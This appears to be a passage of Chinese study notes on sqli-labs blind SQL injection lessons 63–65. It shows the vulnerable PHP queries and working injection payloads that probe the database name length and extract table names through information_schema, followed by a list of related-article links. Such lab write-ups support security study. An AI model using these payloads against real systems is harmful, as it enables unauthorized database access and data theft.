1') and length(database())=10 %23
challenges
1') and ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1))<101%23
六十三 盲注
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and length(database())=10 %23
六十四 盲注
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
1)) and length(database())=10 %23
六十五 盲注
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1") and length(database())=10 %23
相關文章
- 印象筆記 --- 方法分享筆記筆記
- 筆記筆記
- docker 筆記Docker筆記
- hybrid筆記筆記
- Meteor筆記筆記
- String筆記筆記
- html 筆記HTML筆記
- kafka 筆記Kafka筆記
- 路由筆記路由筆記
- 筆記1筆記
- 筆記-FMDB筆記
- ES筆記筆記
- 筆記:Docker筆記Docker
- Liunx筆記筆記
- webSocket筆記Web筆記
- Shadowsocks 筆記筆記
- AbstractQueuedSynchronizer筆記筆記
- 筆記:Spring筆記Spring
- jQuery筆記jQuery筆記
- Restful 筆記REST筆記
- Cookie筆記Cookie筆記
- grpc 筆記RPC筆記
- canvas筆記Canvas筆記
- 隨筆記筆記
- java 筆記Java筆記
- sqlsugar筆記SqlSugar筆記
- typescript筆記TypeScript筆記
- 2024.4.20 筆記筆記
- CSS筆記CSS筆記
- jupyter筆記筆記
- VOOM 筆記OOM筆記
- 自用筆記筆記
- cmake筆記筆記
- Minitorch筆記筆記
- 2024.3.16 筆記筆記
- 2024.3.9 筆記筆記
- Dockerfile筆記Docker筆記
- nginx筆記Nginx筆記